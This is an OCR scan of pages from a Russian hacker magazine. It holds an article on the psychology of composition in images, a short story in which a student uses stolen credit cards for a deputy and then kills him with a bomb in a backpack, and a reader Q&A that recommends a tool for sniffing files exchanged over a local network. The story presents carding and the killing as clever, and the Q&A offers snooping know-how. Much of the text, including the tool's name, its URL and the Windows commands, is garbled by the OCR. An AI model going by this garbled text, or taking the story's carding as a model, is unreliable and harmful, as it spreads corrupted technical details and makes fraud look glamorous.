множество способов оторвать взгляд зрителя и увести его совсем в 



бражая альпиниста, карабкающегося в гору, лучше посадить его на 
минорную диагональ, чтобы показать, что это действительно серьезный 
подъем, а не легкая туристическая прогулка. Другой пример: паровоз 
братьев Люмьер, движущийся вперед по «неправильной» мажорной 
диагонали, вызвал огромный психологический дискомфорт и протест, 
закончившийся массовым разбега нием зрителей. А вот если бы он 
двигался по «правильной» минорной диагонали, был бы полный психо- 
логический комфорт — и никакого переполоха. Вот, оказывается, какие 



другом направлении или, например, приковатьего квнешне незначи- 
тельному и второстепенному элементу. Мы можем спрятать красотку, 
да так, что ты ее не найдешь, или, наоборот, выделить непримечатель- 
ную деталь композиции, на которую в другом случае ты ни за что бы не 
обратил внимание. 

Самыми мощными элементами являются диагонали (как действи- 
тельные, таки воображаемые/мнимые). Примерами действительных 
диагоналей могут быть береговая линия, женские ноги и т.д., то есть 
реально существующие геометрические линии. Воображаемые диаго- 
нали, в частности, выстраиваются точками, образованными верхушка- 
ми деревьев или цепочкой идущихлюдей, — диагональ какбы есть, и в 
тоже время ее какбы нет. Выделение мнимых диагоналей — результат 
работы подсознания (на низком, начальном уровне) и центров высшей 
нервной деятельности (когда для выстраивания диагонали требуется 
при влечь жизненный опыт вкупе с воображением). 

В чемже мощь диагоналей? Автом, чтоони позволяют легко манипули- 
ровать взглядом, определяя направление чтения картины и создавая 
необходимое настроение, то есть задавая способ интерпретации изо- 
бражения, откладывающий отпечаток на его восприятие. 

Диагональ, направленная из левого нижнего угла в правый 
верхний, называется восходящей или мажорной диагональю. 

Глаз беспрепятственно скользит източкиАвточкуВ, подчиняясь 
естественным потребностям сознания. Если разместить на мажор- 
ной диагонали симметричный силуэт машины, глядя на который, 
не разберешь, где ее перед, а где зад, то 90% людей скажет, что 
машина поднимается по диагонали! Оставшиеся 10% мысленно 
помещают себя не над картинной плоскостью, а сбоку от нее (как 
правило, слева) и потому воспринимают машину как удаляющуюся. 
Спуск по мажорной диагонали (когда он обозначен явно) вызывает 
ощущение психологического протеста и дается подсознанию струдом. 
При этом по нисходящей, или минорной, диагонали (направленной из 
верхнего левого угла в правый нижний) спуск, напротив, происходит 



непростые эти диагонали! 

Диагонали не обязательно должны соединять два угла. Они могут 
располагаться в любом месте, слюбым наклоном, но всякий раз, встре- 
чая диагональ, глаз начинает невольно скользить вдоль нее, пока не 
натолкнется на какой-нибудь объект, повешенный на ее конец (логотип 
фирмы, конец кадрового пространства и т.д.). Чем круче располага- 
ется диагональ, тем ближе она к вертикали и тем мощнее. Картинки с 
преобладающими вертикалями читаются сверху вниз и психологически 
воспринимаются какактивное действие. Напротив, изобилие горизонта- 
лей или диагоналей суглом, не превышающим 45 градусов, располагает 
к повествовательному прочтению картины, при этом чтение происходит 
слева направо. 

Это очень важный момент! Допустим, если слева расположен преступ- 
ник с пистолетом, а справа жертва, истекающая кровью, то мы читаем 
сюжеттак: преступникубил жертву. А вотесли поменять персонажей 
местами, то получится, что жертва убита преступником. Вроде бы 
мелочь, но в искусстве (в отличие от математики) перемена мест сла- 
гаемых влияет на результат самым кардинальным образом (что, кстати, 
повсеместно используется в военных и политических репортажах). 
Хорошо! Вот та кой пример. Демонстранте куском камня и полицейский 
с дубинкой. Ведь «полицейский бьет демонстранта» и «демонстрант 
нападает на полицейского» — это диаметрально противоположные 
трактовки! А по сути, запечатлено одно и то же событие. Ты все еще 
веришь в то, что фотожурналистика может быть объективной? 
Психологи также вводят понятие «матрицы эмоций». Все мы согла- 
шаемся, что верх — это верх, низ — это низ, и никаких сомнений по 
этому поводу быть не может. А вот направление вправо подсознательно 
ассоциируется сдвижением вперед и в будущее! Соответственно, 
направление влево означает отступление, уход назад, в прошлое. Пра- 
вый верхний угол несет в себе положительные эмоции. Левый нижний 
— сплошной негатив. В середине кадрового пространства всегда царит 
спокойствие, покой и безмолвие. Естественно, матрица эмоций — это 
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Когда происходит принятие 
сознанием картинки из подсо 
знания, возможные резуль- 
таты неподвластны разуму, 
поскольку понятие индивиду- 
альности для каждого чело- 
века претитегологическому 




всего лишыонкая вуаль бессознательного. Не стоит воспринимать ее 
слишком буквально. 

Впрочем, мы отвлеклись. Вернемся кнашим фазанам. Вточке пересече- 
ния мажорной и минорной диагоналей находится геометрический центр 
изображения (на рисунке «Структура кадрового пространства» обозна- 
ченный букой 2 ). Сюда по неопытности молодые фотографы и больные 
на головудизайнеры помещаютсюжетно-важные объекты, забывая о 
том, что оптический центр (как раз и привлекающий к себе внимание) 
расположен чуть выше (и обозначен буквой V). Сюжетно-важный объект, 
размещенный слева от оптического центра, воспринимается как наезд 
камеры (сіове и р) и придает снимку гораздо большую выразительность и 
динамизм. Напротив, правее оптического центра находится зона «убега- 
ния», которую также можно использовать, если действовать с умом. 
Помимо двух обозначенных центров (геометрического и оптического), 
существуетеще и смысловой центр композиции, в котором помещен 
наиболее активный сюжетный объект. Бессознательно зритель ожидает 
увидеть смысловой центр внутри оптического. Нарушение этого правила 
вызываетощущение движения смыслового центра в плоскости кадра 
или даже перпендикулярно ему. Смысловых центров может быть сколько 
угодно. Если их больше одного, то внимание зрителя скачет от одного 
центра кдругому, заставляя сравнивать, сопоставлять, думать, анали- 
зировать. Слишком большое количество смысловых центров приводит к 
хаотичному движению взгляда, которому не за что зацепиться, и обычно 
такие изображения не рассматриваются дольше нескольких секунд. 
Теперь переходим к самой трудной и неоднозначной части нашего 
повествования. Речь пойдето «правилетретей» и «золотом сече- 
нии». Считается (и не без оснований), что если разделить кадровое 
пространство вертикальными/горизонтальными линиями на «дольки», 
составляющие 1/3 длины/ширины пространства (на рисунке «Струк- 
тура кадрового пространства» они обозначены буквой Т), то разме- 
щение сюжетных объектов на этих линиях образует эффект гармонии. 

В частности, горизонт, расположенный ровно посередине, выглядит 
просто кошмарно (за редкими исключениями), но стоит сместить его 
на 1/3 высоты кадра — и снимок буквально преобразится. Здания и 
колонны также следует стремиться размещать по краям на расстоянии 
1/3 ширины кадра. Но это мелочи. Главное, что точки, образованные 
пересечением «третичных» линий, подсознательно приковывают к 



себе взгляд, позволяя выделять сюжетные детали из общего фона, 
даже если они не имеют никаких других отличительных признаков. 
Наиболее сильные — левая нижняя и правая верхняя точка. 

Вот мы и добрались до «золотого сечения», которое равно числу «фи», 
вычисленному в настоящее время с очень большой точностью и, кстати 
говоря, достаточно близкому к правилу третей. 

Насколько близкому? А вотздесь мнения расходятся. Большинство 
людей воспринимает правилотретей намного более естественно и 
гармонично (к слову сказать, первые фотографии и телевизоры как раз 
строились по гармоничному правилу золотого сечения, но народ не 
принял эту гармонию, вот та к и поя вились привычные стандарты, в том 
числе и отпечаток 1 0x1 5). 

Тем не менее золотое сечение широко распространено в искусстве и 
архитектуре. От него никуда не уйти. На рисунке «Структура кадрового 
пространства» линии золотого сечения отмечены буквами 0. Согла- 
сись, что в сравнении с правилом третей кажется, что золотое сечение 
«зажимает» композицию, создавая некоторый дискомфорт. С другой 
стороны, математическая точность от художников/фотографов/дизай- 
неров нетребуется, и зачастую оченьтрудно отличить одно отдругого, 
тем более если ключевые сюжетные элементы представляют собой не 
точечные, а протяженные объекты без ярко выраженного центра. 
Нельзя не упомянуть и о так называемых «хо гартовых линиях», 
получивших свое название в честь английского искусствоведа 
Уильяма Хогарта. Со второй половины семнадцатого века они 
доминировали в стилях барокко и раннего классицизма как вопло- 
щение идеальной гармонии, отмеченной перстом высшей силы, и 
конечной формы красоты. 

На самом деле это всего лишь спирали, в упрощенном виде изобра- 
женные на рисунке «Примеры хо гартовых линий...». В зависимости от 
построения, спираль можетлибо «всасывать» взгляд от периферии к 
центру (фигура слева), либо же «разворачивать» движение от центра к 
периферии. Комбинируя спирали с остальными опорными элементами 
(например, с диагоналями), мы можем создавать определенный ритм, 
подчиняющий себе движение глаз и навязывающий зрителю задан- 
ный вариант восприятия. 

Предпринимаются многократные попытки создать особый вид ритма, 
совпадающий с ритмом человеческого сердцебиения, однако это уже 
тема отдельного (между прочим, весьма интересного) разговора. 

ЗАКЛЮЧЕНИЕ 

Вот мы и познакомились некоторыми основами психологии воспри- 
ятия. Подчеркиваю, что именно с некоторыми. До полноты картины 
нам еще очень далеко, но прежде чем бежать вперед, необходимо 
усвоить уже имеющийся материал, упражняясь в анализе реклам- 
ных плакатов и чужих фотографий. Гарантирую, что ты обнаружишь 
множество новых интересных вещей, а если повезет, сможешь пере- 
хватить сообщение, адресованное непосредственно подсознанию, и 
расшифровать его. т 
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з сводки новостей: «В последнее время участились случаи 
вандализма в Центральном округе Москвы. Неизвестные, но 
уже находящие в разработке преступники ломают припарко- 
ванные на уличных стоянках автомобили. Судя по всему, это 
молодежные группировки, таким образом высказывающие некий протест 
существующему укладу городской жизни, поскольку никакой выгоды из 
мятых дверей и разбиты фар извлечь невозможно. Случайные свидетели 
дают противоречивые показания...» 

Сергей частенько задумывался, какэто все случится. То есть как будет 
в ы гл я деть этот человек. 

Оказалось, ничего особенного. Мордатый такой, сзалысинами. Животик 
не самых выдающихся размеров. Потное лицо, которое он чересчур часто 
вытирал платком — скорее от волнения, нежели по какой-то другой причине. 
Злые (что совсем неудивительно) глаза, маленький перекошенный рот... 

— Пять штук! — взвизгнул он, в очередной разтолкнув Сергея. Если бы 
не ролики, он удержался бы на ногах, но асфальт щедро принял его в свои 
объятия. Проходящие мимо люди даже и не думали вмешаться — мало ли 
что за разборки происходят в центре города, на Новом Арбате. 

Друзья Сергея прекратили свои акробатические занятия перед 
входом в торговый дом «Москвичка» и собрались маленькой кучкой 
неподалеку, уже не проявляя особой активности. Их приятель попал 
в очень нехорошую историю, и похоже, что они ничем немо гут ему 
помочь. Только и оставалось — стоять и смотреть, иногда шепотом 
произнося несколько слов друг другу, вроде быв оправдание своей 
бездеятельности. Даже их вечные конкуренты в борьбе за место под 
солнцем на этом тротуаре — любители безумных прыжков на байках 
и громыхалы на скейтах — прекратили на время свои упражнения и 
ждали развязки. 

А Сергей лежал на асфальте и прижимал к груди доказательство своего 
преступления — отломанное от навороченной бэхи зеркало. 

— «Уши» закрывать надо на парковке, — сумел выдавить он из себя. 

— Я случайно... 

— Су-ука! — навис над ним хозяин автомобиля, который буквально за 
несколько секунд до происшествия сел в машину и собирался уехать. 

— Я тебя закрою! Тварь! Пять штук минимум! Да его еще найти надо, 
модель редкая! Вставай, падла! 

И он ударил Сергея ногой. Несильно, но втолпе вокруг кто-то попытался 
высказаться в защиту лежащего на земле парня в роликах. Хозяин бэхи 
зыркнул на стоящих подростков — и наступила тишина. 

Сергей струдом поднялся — здорово приложился головой при падении. 

В ушах шумело, оставалосьтолько радоваться тому обстоятельству, что он 
никогда не снимал со спины рюкзаке обувью — тот немного смягчил удар. 
Покачнувшись, он машинально оперся рукой на машину итутже получил 
сильный тычок в плечо, едва не упав снова. 

— Хватитлапать, скотина! — казалось, что жить Сергею оставалось не- 



сколько минут, не больше. — Сволочь! Развелось экстремалов, уроды! 
Мужик развернулся лицом ктолпе и крикнул, обращаясь сразу ко всем: 

— Что, цирк?! Твари! Я еще вам издам закон, будете за свои развлечения 
такие налоги и штрафы платить! 

Тут кто-то обратил внимание на большой пропуск в виде российского 
флага под стеклом. 

— Депутат, сука... — раздался громкий шепот откуда -то из-за спин. 

— Сейчас еще наряд вызовет, а те и разбираться не будут... 

И толпа зевак постепенно стала уменьшаться. Никто так и не вступился за 
Сергея: байкерыубрали свойтрамплин на газон, скейтбордисты уехали за 
пивом, а невольные свидетели и сочувствующие двинулись по своим делам. 
Сергей остался один на один с взбешенным депутатом. Исподлобья он 
смотрел на хозяина автомобиля, от которого он на приличной скорости, не 
справившись со своими ногами и непослушными колесами роликов, ото- 
рвал боковое зеркало. Ударился прилично, боком. И только почувствовал 
сильную боль где-то под ребрами, как громкий пластмассовый хруст дал 
ему понять, чтодело совсем плохо. Взмах руками, падение... 

Зеркало лежало наземле, аубэхиуже открывалась дверь. Хозяин, как 
назло, оказался внутри... 

Он, конечно, могудрать, но, попытавшись подняться, сходу врезался в 
металлическую урну и снова растянулся на земле. А еще через секунду 
цепкая рука схватила его плечо. 

Так и случилась в его жизни самая серьезная неприятность за последние 
лет пять, не считая кучи отработок в институте, который грозил вот-вот 
так же швырнуть его на асфальт за своими воротами, как и этот бешеный 
депутат. Отломанное зеркалотянуло, как и грозился хозяин, тысяч на пять 
долларов, ато и больше. Что может сделать самый обыкновенный студент 
для того, чтобы вернуть подобные деньги, известно одномулишь богу... 
Сам Сергей ответа на этот вопрос не знал. 

— Документы есть? Кто ты такой? — депутат сразу принялся раскручивать 
Сергея. — Давай быстрее отвечай. Чем быстрее разберемся, тем быстрее 
на моей машине вырастет новое зеркало, козел! Или сейчас вызову 
наряд! 

— Сергей Васильев, — шмыгнул тот в ответ носом. — Студент. Иногород- 
ний. В общаге живу. 

— Где? 

— Какая разница где? — огрызнулся Сергей. — Выселять собираетесь? 
Депутат зло прищурился. 

— Документы есть? 

— Есть. Я что, похож на китайца-нелегала? — отвечая, Сергей смотрел по 
сторонам, выбирая место, куда бы быстро шмыгнуть, чтобы вырваться на 
выложенный плитами тротуар. Только бы он отпустил руку, а там скорость, 
за угол направо, мимо бара «Жигули», Старый Арбат, переулочки... Никто 
не найдет. 

— Чегозыркаешь?! Ноги хочешь сделать? -легко догадался о намерени- 
ях Сергея депутат. — Снимай коньки! 
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Видя несогласие Сергея, он потянулся ксотовомутелефону в сумочке на 
поясе. 

— Ладно, сниму, сниму... — Сергей нехотя стащил ролики, вынул из рюк- 
зака кроссовки, обулся и встал. Коньки перекочевали в рюкзак. 

— Как думаешь мне ремонт возмещать? 

Васильев пожал плечами. 

— Откуда у меня такие деньги? 

— А это разве моя проблема? — мужик в очередной раз вытер лицо и 
шею и расстегнул еще одну пуговицу на рубашке. — Вот когда я хотел эту 
машину купить, тогда у меня были проблемы... 

— Ну, это вряд ли, — машинально вставил Сергей. — У вас — и вдруг 
проблемы?! 

Зря он это сказал... Мужик взбесился не на шутку. Он засопел так, что 
несколько человек на стоянке обернулось в поисках источника звука. 

— Ах ты, гаденыш! — депутат навис над ним (хотя они и были практи- 
чески одного роста, ситуация подняла одного и сделала ниже ростом дру- 
гого). — Каждый норовитткнуть пальцем: на какие деньги это, на какие 

— то! Взяточников из насделают, врагов народа!.. 

Он продолжал читать Сергею лекцию, нотот не слушал — ситуация не 
располагала к восприятию информации. Пятьтысяч долларов, нависшие 
над ним вместе с депутатом, какдамоклов меч, заставляли мозги напря- 
гаться совсем в другом направлении. Арбатские переулки теперьуже не 
могли спасти его от этого урода, и надо было искать другой выход. 

— Из-за таких, какты, и доверия нет депутатам! 

— А я думал, из-за таких, как вы, — ответил Сергей. — Из-за таких вот, 
которые на дорогих машинах в рабочее время приезжают на Новый 
Арбат в казино. Разве нет? 

— Я в отпуске, — ответил депутат и понял, что для парня это не аргумент. 
Разговор уходил в какое-то не самое выгодное для него русло, надо было 
срочно принимать меры. 

Депутат на несколько секунд замолчал, оставив дальнейшую аргумента- 
цию на болееудачный день. Потом неожиданно сказал. ■ 

— Отработаешь. Готов? 

Сергей даже приподнял брови от удивления. 

— Я-то готов. Но сколько ж работать надо, чтобы пять штук отдать? Где 
такие деньги платят? 

— А что ты сам умеешь, студент? — депутатзаинтересованно посмотрел 
на Сергея, похоже, уже представляя его в роли работника. 

— Я, как в анекдоте, могу копать. А могу и не копать. 

— В смысле «копать»? — не понял депутат. 

— Юмор, — развел руками Васильев, не выпуская из них рюкзака с роли- 
ками. — Анекдот. Ферштейн? 

— Чего?Ты издеваешься? 

— Нет. Там еще продолжение было. 

— Где? 

— В анекдоте... 

Удар вживот остановил Серегино красноречие. Он сложился пополам и присел. 

— За что? — прохрипел он. 

— Думай, — депутат наклонился к нему. — Деньги счет любят. А ты пока 
мне еще ни цента не отдал... 

— А еще говорите, депутат, за Россию бьетесь, — Сергей, будучи пока не 
в силах подняться, посмотрел вверх. — Русский человексказал бы «ни 
копейки»... 

В ответ раздалось невнятное бурчание. Сергей отдышался, встал, маши- 
нально отряхнулся. 

— «Отработаешь», — угрюмо повторил он. — А как? 

— Да уж явно копать не надо. Если только себе могилу, — депутат 
старался говорить тише, заметив, что один из охранников стоянки уже 
готов подойти поближе и разобраться с происходящим, и только флаг на 
машине сдерживает его. — На кого учишься? 

— На программиста. Курс уже третий... Закончил. 

— Хорошо закончил? Или таксебе, троечник? — депутатхитро прищу- 
рился. Похоже, будущая профессия Васильева ему пришлась по душе. 
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— Мнетроечники не нужны. 

— Нормальноучусь, — Сергей старался не смотретьему в глаза. — Пока 
не выгнали. И даже стипендию получаю. 

— Стипе-ендию! — протянул мужик. — И сколько? 

— Вам и не снилось, — огрызнулся Сергей. — Я вам ее буду лет двадцать 
перечислять, чтобы это треклятое зеркало возместить! 

Депутат сочувствующе покивал головой. Причем по его взгляду 
было ясно, что сочувствует он восновномсебе. Надо же было так 
попасть — с этим нищим студентом! Лучше бы уж в него мерседес 
въехал. Там парни обычно не церемонятся, такие деньги у каждого 
в кармане, на мелкие расходы. Первый раз с ним такая лажа! Надо 
будет действительно разобраться с этими экстремалами. Проходу 
людям не дают, гоняют; и ладно, себя калечат, так еще и вокруг 
успевают нагадить: то разобьют или сломают что-нибудь, то в 
ребенка въедут... 

— А на программерском поприще успехи есть? Подрабатываешь где? 
Может, на заказ пишешь? — депутат продолжал допрос с пристрастием. 

— Вот ролики же как-то купил себе? А они немалых денегстоят? 

— Эти? — Васильев махнул рюкзаком. — Бэушные, за треть цены взял 
в общаге. Парень в Америку уезжал стажироваться, тащить за собой не 
хотел. Да он там получше найдет... 

— То естьты пустое место? Лекции, учебники, а в целом ничего не 
можешь? 

Сергей переминался с ноги на ногу, все стараясь не смотреть в глаза 
депутату, и вдруг сквозьтонированное стекло бэхи разглядел на заднем 
сидении машины ноутбук. Тогда он повел себя несколько решительнее... 

— Я смотрю, у вас в автомобиле неплохой аппаратик лежит? 

— На работе всем выдают, — депутат махнул рукой. — Я в нем не очень... 
А тебе каким боком? Надумал чего-нибудь? 

Сергей поморщился, дескать, чего загадывать. Потом огляделся и уви- 
дел на противоположной стороне проспекта вывеску «Спорт-бар». 

— Здесь поблизости есть ѴѴІ-РІ зона. Вон, в кафешке, — он махнул рукой. 

— Можно попробовать намутить чего-нибудь... Только там, чтобы рабо- 
тать, надо заказ сделать... 

— Говори конкретно, что надумал? Решил поесть хорошенько перед 
смертью? Налопаешься от пуза, а потом: «Извините, у меня не получи- 
лось...»? Я-то поем судовольствием, аты стаканом колы обойдешься. 

Уж поверь мне, я найду, какизтебя вытрясти эти деньги. Достану и тебя, 
и мамутвою с папой, и всех родственников. Квартиру продадите, но долг 
вернете. Так что давай начистоту. 

— Кола, так кола. Но лучше кофе. 

Сергей помолчал несколько секунд, собираясьс мыслями, потом объяснил: 

— Идем в кафе, я выхожу в интернет, ломаю чью-нибудь кредитку и 
покупаю вам все, что захотите, можно даже больше, чем на пятьтысяч 
долларов. Хоть на десять. Но тогда уже вы зеркало купите сами. Другого 
способа быстро отдать вам деньги я не вижу. Думайте. Я пока посижу, уж 
очень вы мне больно дали в последний раз... 

Он присел на гранитную облицовку клумбы, исца рапа иную тысяча ми 
роликов и скейтов, по-прежнему не выпуская из рук рюкзак и цепляясь 
за него, как за ниточку, связывающую его с привычным ему миром, в 
котором нет отломанных зеркал, огромных долгов и сволочей с флагами 
под стеклом. 

Депутат выслушал его внимательно и ничего сразу не ответил. О карде- 
рах он, конечно, слышал — все-таки в Государственной думе не самые 
отсталые люди работают. Слышал о том, как взламывают кредитки 
америкосов, находят доверенных лицза границей, которые получают 
купленныйтовар и пересылаютего в Россию. От механизма взлома он 
был чертовски далек, нотеория Павлова сработала и в этот раз — слюна 
стала выделяться... 

— Сколько тебе времени надо? — спросил он у Сергея спустя пару минут. 

— Как карта ляжет, — неуверенно пожал плечами тот. — Опыт есть, как 
положительный, так и отрицательный. Не получится за полчаса — сде- 
лаю за час. Не получится за час... 




► 140 






•г 




— Час — хороший срок, — оборвал его депутат. — И смотри у меня, взду- 
маешь обмануть... 

— Да куда я денусь, — отмахнулся Васильев. — Если я правильно понял, 
вы согласны? 

— Согласен попробовать, — уточнил тот в ответ. — И пойми суть 
проблемы — я человек публичный, мне бы с тобой светиться по всяким 
забегаловкам не хотелось... 

— Это шутка? — поднял брови Сергей. — Вы же меня на стоянке 
отхлестали, наверняка какой-нибудь папарацци уже фотки в интернете 
выложил! 

— Даст бог, обойдется, — отмахнулся депутат. — Бери ноутбук и пойдем, 
тут переход рядом. 

Васильев открыл дверь, бросил на сиденье рюкзак и потянулся за ноут- 
буком. Знакомый логотип... 

— Хорошая машинка, — погладил он серебристую крышку. — На сколько 
батареи хватит? 

— Тут все серьезно. Нам фуфло не дают. На благое дело хватит. 

— Ну-ну... — Сергей открыл крышку, быстро пробежал глазами по на- 
клейке стехнической характеристикой и уважительно покачал головой. 
Они обменялись с хозяином ноутбука взглядами натемутого, кто будет 
нести эту продвинутую железяку. Выяснилось, что Сергей. 

Они спустились в переход, обошли бросившихся им под ноги то ли цы- 
ганят, то ли еще кого-то — измазанных, маленьких, но со сверкающими 
глазами. Сергей неудержался — перед лестницей наверх сунул какой-то 
бабушке с протянутой рукой мелочь. 

Они вошли в «Спорт-бар». Народу было немного, в основном за столика- 
миу окон. Чтобы не бросаться в глаза входящим, они прошли на второй 
этаж, сели в уголке. Депутат попросил меню, а Сергей — пароль для 
подключения кѴѴІ-РІ. Официантбыстро набросал набор цифр и букв на 
салфетке и ушел к бару за меню. 

— Мне колы, — напомнил Васильев и раскрыл ноутбук. 

— Я помню, ты работай, — ослабив узел галстука и расстегнув верх- 
нюю пуговицу рубашки, депутат откинулся на спинку стула в ожидании 
официанта. 

Сергей размял пальцы над клавиатурой, прикрыл глаза и постарался 
сосредоточиться. На концентрациюушло около минуты, после чего он 
уверенно набрал пароль, подключился и принялся за работу. Програм- 
мно ноутбукбыл оснащен более чем — Васильев даже удивился тому 
набору, который он здесь обнаружил. Проблем практически не возникло 

— несколько человек откликнулось на его зов после контрольных фраз и 
паролей. 

Тем временем официант принес меню. Депутат принял его с нетерпением: 

— Далеко не уходите, я сразу закажу. 

Сергей поднял глаза. 

— Чего смотришь? Тут же в основном суши — я это дело уважаю. 

И он начал перечислять официанту какие-то японские названия, ни одно 
из которых не было знакомо Васильеву. Длинный список за кончился 
словами: «Да, и еще стакан колы вот этому...» 

Официант все записал, повторил слово в слово и ушел. Первой на столе 
появилась кола. Сергей потянул ледяную сладость через трубочку и 
продолжил свои манипуляции. Пара собеседников сразу же отказалась 
от сотрудничества без объяснения причин. Васильев не стал спрашивать 

— мало ли у кого какие проблемы? За кем-то следят, кто-то не имеет сей- 
час выходов на нужных людей... Слишком сложная порой выстраивается 
цепочка, и чем она длиннее, тем больше в ней уязвимых мест. 

Временами Сергей бросал взгляд на часы. Время хоть и медленно, но 
шло. Безусловно, часа ему не хватит, но ктому моменту, когда обговорен- 
ное время закончится, депутат уже выпьет водочки, расслабится и будет 
снисходительнее. 

— Ничего, что вы за рулем? — между делом кивнул он в сторону запотев- 
шего графинчика, который появился на столе следом за его стаканом. 

— Работай... Арбайтен, нечего за мной следить! — словно пытаясь что-то 
доказать, а скорее длятого чтобы подчеркнуть свою безнаказанность, он 



налил себе полную рюмку и выпил не закусывая. Васильев проводил этот 
жест взглядом и снова вернулся к работе. 

Спустя минут пятнадцать он спросил: 

— Какиетовары интересуют? Электроника, бытовая техника, одежда? 
Может, лекарства какие-нибудь дефицитные? 

— Все хочу, — пережевывая что-то экзотическое, напоминающее крас- 
ную рыбу, сказал депутат. — Все, до чего руки дотянутся. 

— Мои руки сейчас оченьдалеко дотянулись, — Сергейткнул пальцем в 
экран. — Две карты, денег вагон. Давайте быстрей, нечего тут раздумы- 
вать. Предлагаю с ходу: ноутбук «Макинтош» за две с половиной штуки, 
версия «Про», большой экран, красотища! 

— На кой черт мне два? — удивился депутат. 

— Подарите кому-нибудь, — ответил Васильев. — «Макинтош», как 
мерседес, всегда в цене. 

— А ты прав, пожалуй... Ладно, давай. А что еще есть? 

— Да все что угодно. Холодильники, кондиционеры, телевизоры, центры 
музыкальные... 

— Так, может, и зеркало можно купить? 

— Честно говоря, незнаю, — Сергей отрицательно покачал головой. 

— Вдруг неправильно подберу?Тут ведь надо на сайтавтосалона захо- 
дить, по номеру кузова подбирать. Засветимся. А наугад брать не стоит. 

— Правильно, — водка уже делала свое дело. — Ладно, давай какой-ни- 
будьтелевизор огромный, в коттедж поставлю. Что-нибудь этакое, 
огромное... 

— Проекционный? 

— А это что такое? 

— А это — не пожалеете. Итак, получается, ноутбук и телевизор. Итого 
почти семьтысяч. Вам это будет стоить... 

Он застучал клавишами, ухмыльнулся, потом развернул экран кдепутату 
и показал сумму в диалоговом окне, прикрыв пальцем н и ктого человека, 
с которым разговаривал. Тот отвлекся от поедания рыбы, посмотрел и 
кивнул, соглашаясь. 

— Оформляем? Тогда говорите адрес, на который это хозяйство будет 
из Америки выслано. Естественно, не свой. Доставка через три недели. 
Отправят пароходом —там сложностей меньше... 

Когда депутат все съел и расплатился, они вышли на крыльцо «Спорт- 
бара». Ноутбукуже был в руках хозяина. 

— Имя мое вы знаете, общагу найдете, если вдруг будут проблемы, 

— Сергей щурился, глядя на солнце. — В расчете? 

— Проваливай. 

— И на том спасибо. 

Сергей шагнул в сторону «Московского дома книги», посмотрел по сто- 
ронам и исчез в прилегающем дворе. Депутат вернулся в машину, открыл 
дверь и сразу же заметил лежащий на полу рюкзак студента. 

— Вотурод!.. Забыл свое барахло. 

Он положил компьютер на сиденье и взял рюкзак, намереваясь выкинуть 
его на улицу... 

Мощный взрыв подбросил бэху метра на два. Изуродованным куском ме- 
талла упала она обратно. Спустя секунду раздались крики людей, завыли 
сотни потревоженных сигнализаций. Столб дыма взвился вверх, унося в 
небо памятьохозяине машины сфлагом... 

— Да, все сделано, — говорил Васильев втелефон. — Я сам видел, 
далеко не уходил. Чего так долго? Редко когда удается закардить ко- 
го-нибудьтак, чтобы следов не оставалось, а тут этот смертник со своими 
ноутбуком. А теперь — ни машины, ни владельца. Да, знаешь, я на твое 
имя посылочку оформил. Как придет, получи. Там тебетелевизор и мне 
«Макинтош». И еще пару роликовых коньков заказал — мои вместе с 
этим уродом испарились. Вообще, затея с роликами неплохая. Он сразу 
повелся. Такчто будутзаказы — звони. Исполню... 

Он еще раз кинул взгляд на горящую машину и вспомнил, сколько зеркал 
оторвал за последние десять дней, пока не научился делать это профес- 
сионально... 

До прихода «Макинтоша» осталосьтри недели. Подождем. т 
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СТЕПАН «ЗТЕР» ИЛЬИН 



РАОГаКЕМ.ХАКЕР.КЦ 

ЗАДАВАЯ ВОПРОС, ПОДУМАЙ! НЕ СТОИТ ПОСЫЛАТЬ МНЕ ВОПРОСЫ, ТАК ИЛИ ИНА- 
ЧЕ СВЯЗАННЫЕ С ХАКОМ/КРЯКОМ/ФРИКОМ, ДЛЯ ЭТОГО ЕСТЬ НАСК-РАО (НАСКРАОИ 
РЕАЬ.ХАКЕРРЫ); НЕ СТОИТ ТАКЖЕ ЗАДАВАТЬ ОТКРОВЕННО ЛАМЕРСКИЕ ВОПРОСЫ, 
ОТВЕТ НА КОТОРЫЕ ТЫ ПРИ ОПРЕДЕЛЕННОМ ЖЕЛАНИИ МОЖЕШЬ НАЙТИ И САМ. Я 
НЕТЕЛЕПАТ, ПОЭТОМУ КОНКРЕТИЗИРУЙ ВОПРОС, ПРИСЫЛАЙ КАКМОЖНО БОЛЬШЕ 
ИНФОРМАЦИИ. 



О: В одном из ваших прошлых номеров вы рассказывали о «рыбал- 
ке» — приеме, позволяющем перехватить данные, которые качают 
пользователи спутникового инета (при наличии соответствующего 
оборудования, естественно). А возможно л и ловить рыбку в рамках 
локальной сети и снифать файлы, которые пользователи передают 
между собой по локалке? 

А: Тут все зависйт оттого, как передаются файлы между пользова- 
телями локальной сету і . Скорее всего, пользователи просто кидают 
друг другу файлы через «Сетевое окружение», то есть через МісгозоіТ 
ѴѴІпсІоѵѵз Меіѵѵогк. В подобном случае используется специальный 
механизм, основанный на протоколе Зегѵег Меззаде В Іоск (5 МВ), опи- 
сывающей формат сообщений, используемый для передачи файловых | 
запросов (ореп |— открыть, сіозе — закрыть, геаб — прочитать, ѵѵгііе 
— записать и т.гі.) между клиентами и серверами. Эти'сообщения легко 1 
перехватить, а вместе сними легко перехватить и файлы. Для этого 



существует несколько утилит. Рекомендую попробовать 5МВ Рііе 
ЗпііТег [ \ллллллтісгооІар»сот/рго гіисІз/пеІѵуогк/злпЬЛІеепі^ег ). 

О: Никак не пойму: каким образом на однопроцессорной системе реа- 
лизуется многозадачность? 

А: Минимальной единицей исполнения программного кода в ѴѴі псіоѵѵз- 
системах является поток. Процесс представляет собой всего лишь 
«контейнер» для- потоков, позволяятим разделять общее адресное 
пространство, дескрипторы и прочие ресурсы. Однако каждый поток 
владеетсвоим собственным контекстом, включающим в себя набор 
регистров и стек. Каждый процесс имеет по меньшей мере один поток, 
создаваемый при его старте, нов дальнейшем программист может 
создавать столько потоков, сколько ему заблагорассудится, удаляя их в 
любой момент времени. Так, когда все потоки процесса уничтожаются, 
процесс исчезает, высвобождая ранее занятые ресурсы. 
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Азнаешьли ты... 

• что стандартное сообщение об ошибке, выведенное с помощью 
тевваде Ьох'а.таитв себе один большой секрет. Я в свое время 
оченьудивлялся, почему сообщение об ошибке нельзя выделить 
и скопировать в буфер обмена. Оказалось, можно. Надо просто 
без всяких выделений нажать стандартные <СТРІ_-С> — и все, 
сообщение будет в сІірбоагсГе. 

• что для корректной установки йИ-библ потеки в Винде не- 
достаточно просто кинуть ее в системный каталог (к примеру, в 

С :\ѴѴІ N 00ѴѴ5\вув1:ет32). Ее также обязательно нужно прописатьс 
помощью команды гедвѵг32 бІепате.сНІ. 




